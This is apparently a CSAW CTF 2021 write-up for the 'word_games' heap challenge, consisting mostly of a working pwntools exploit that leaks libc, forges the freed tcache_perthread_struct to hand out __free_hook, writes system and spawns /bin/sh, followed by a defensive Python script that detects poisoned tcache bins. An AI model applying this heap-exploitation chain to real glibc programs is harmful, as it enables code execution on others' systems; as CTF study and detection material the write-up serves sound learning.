[ CSAW CTF 2021 ] word_games

sangjun · 2021. 9. 13. 18:07


1. A heap exploit without a BOF?

2. Once four chunks containing "fun" have been allocated, the tcache_struct is freed.

3. Manipulate the tcache_struct to overwrite free_hook.


from pwn import *
context.log_level='debug'
#p=process("./a.out",env={"LD_PRELOAD":"./libc-2.33.so"})
p=process("./word_games")
e=ELF("./word_games")
#libc=ELF("./libc-2.33.so")
libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")
#p=remote("pwn.chal.csaw.io",5001)

# menu 1: allocate a chunk of `size` bytes and fill it with `data`
def malloc(size,data):
    p.sendlineafter(">","1")
    p.sendlineafter(">",str(size))
    p.sendafter(">",data)

# menu 2: free every chunk allocated so far
def free_all():
    p.sendlineafter(">","2")

# helper for attaching a debugger (not used in the final run)
def debug():
    log.critical(f"pid= {pidof(p)[0]}")
    pause()
    p.interactive()

#libc leak
# a 0x500 request is too large for tcache, so after free_all() the chunk
# carries libc (arena) pointers in its metadata; re-allocating part of it
# and overwriting only the first 8 bytes leaves the second pointer intact
malloc(0x500,"A"*8)
free_all()
malloc(40,"funABBBB")
p.sendlineafter(">","3")          # menu 3 prints the chunk contents
p.recvuntil(b"BBBB")
leak=u64(p.recvline()[:-1].ljust(8,b"\x00"))
log.critical(f"leak= {hex(leak)}")
libc_base=leak-0x4a0-libc.sym['__malloc_hook']
free_hook=libc_base+libc.sym['__free_hook']
system=libc_base+libc.sym['system']
malloc(1136,"AAAA")               # padding allocation

# four "fun" chunks: after these the tcache_perthread_struct itself is freed
malloc(0x20,"fun"+"c"*(0x20-3))
malloc(0x20,"fun"+"d"*(0x20-3))
malloc(0x20,"fun"+"c"*(0x20-3))
malloc(0x20,"fun"+"d"*(0x20-3))

# forge a tcache_perthread_struct (glibc 2.33 layout: 64 x uint16 counts,
# then 64 x 8-byte entries)
payload  = b'\x00'*0xe + b'\x01\x00'  # counts[7] = 1 (bin for 0x90 chunks)
payload += b'\x00'*0x80
payload += b'\x00'*0x28               # skip to entries[7] = 0x80 + 7*8
payload += p64(free_hook)             # head of the 0x90 bin -> __free_hook
payload=payload.ljust(448,b"\x00")

malloc(0x280, payload)            # 0x280 == sizeof(tcache_perthread_struct): reclaims the freed struct
malloc(0x80, p64(system))         # 0x90-sized request returns __free_hook; write system
malloc(0x10, "/bin/sh\x00")
free_all()                        # free("/bin/sh") -> system("/bin/sh")

log.critical(f"libc_base= {hex(libc_base)}")
p.interactive()
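The forged struct in the payload above is easier to reason about once the glibc 2.30+ `tcache_perthread_struct` layout (64 `uint16_t` counts followed by 64 entry pointers, 0x280 bytes in total) is parsed explicitly. The following is an added example, not part of the writeup or the challenge: a small inspector that decodes a raw dump of that struct and flags bins whose head pointer does not lie inside the heap mapping, which is exactly how a hook address planted in `entries[7]` would stand out when triaging a heap. The heap range and the libc address are constructed placeholders, not values from the exploit run.

```python
import struct

# tcache_perthread_struct layout for glibc >= 2.30 (the writeup targets 2.33):
#   uint16_t counts[64];        offsets 0x00 .. 0x7f
#   tcache_entry *entries[64];  offsets 0x80 .. 0x27f
TCACHE_BINS = 64
COUNTS_BYTES = TCACHE_BINS * 2
STRUCT_BYTES = COUNTS_BYTES + TCACHE_BINS * 8   # 0x280, the size the writeup requests


def bin_chunk_size(idx):
    """Chunk size served by tcache bin idx (0x20, 0x30, ..., 0x410)."""
    return 0x20 + idx * 0x10


def parse_tcache(blob):
    """Split a raw dump of tcache_perthread_struct into (counts, entries)."""
    blob = bytes(blob).ljust(STRUCT_BYTES, b"\x00")[:STRUCT_BYTES]
    counts = struct.unpack("<64H", blob[:COUNTS_BYTES])
    entries = struct.unpack("<64Q", blob[COUNTS_BYTES:])
    return list(counts), list(entries)


def find_poisoned_bins(blob, heap_start, heap_end):
    """Report bins whose head pointer cannot be a legitimate free chunk.

    A genuine tcache entry always points at user memory inside the heap
    mapping; an entry pointing elsewhere (a libc address, for instance) or a
    non-zero count with no entry at all indicates the struct was tampered with.
    Returns a list of (bin index, chunk size, pointer, reason) tuples.
    """
    counts, entries = parse_tcache(blob)
    findings = []
    for idx in range(TCACHE_BINS):
        ptr = entries[idx]
        if ptr == 0:
            if counts[idx]:
                findings.append((idx, bin_chunk_size(idx), ptr, "count without entry"))
        elif not (heap_start <= ptr < heap_end):
            findings.append((idx, bin_chunk_size(idx), ptr, "entry outside heap"))
    return findings


# Constructed sample addresses (placeholders, not taken from a real run).
HEAP_START = 0x555555559000
HEAP_END = 0x55555557A000
LIBC_ADDR = 0x7FFFF7FC1E20   # stands in for an address inside libc


def fake_struct_from_writeup():
    """Same byte layout as the writeup's payload: counts[7] = 1, entries[7] = libc address."""
    blob = b"\x00" * 0xE + b"\x01\x00"   # counts[7] (bin for 0x90 chunks) = 1
    blob += b"\x00" * 0x80
    blob += b"\x00" * 0x28               # land on entries[7] at 0x80 + 7*8 = 0xb8
    blob += struct.pack("<Q", LIBC_ADDR)
    return blob


def healthy_struct():
    """A plausible untampered struct: one free 0x90 chunk that lives on the heap."""
    counts = [0] * TCACHE_BINS
    entries = [0] * TCACHE_BINS
    counts[7] = 1
    entries[7] = HEAP_START + 0x2A0
    return struct.pack("<64H", *counts) + struct.pack("<64Q", *entries)


if __name__ == "__main__":
    for idx, size, ptr, why in find_poisoned_bins(fake_struct_from_writeup(), HEAP_START, HEAP_END):
        print(f"bin {idx} (chunk size {size:#x}): {why}, head = {ptr:#x}")
    print("healthy struct findings:", find_poisoned_bins(healthy_struct(), HEAP_START, HEAP_END))
```

Run against the writeup-shaped blob it reports bin 7 (0x90 chunks) with a head pointer outside the heap, which is the state that makes the subsequent 0x80-byte request hand out the hook address; the healthy struct produces no findings. In a real triage the blob would come from a core dump or a debugger read of the first chunk in the heap mapping, and the heap bounds from the process's memory map.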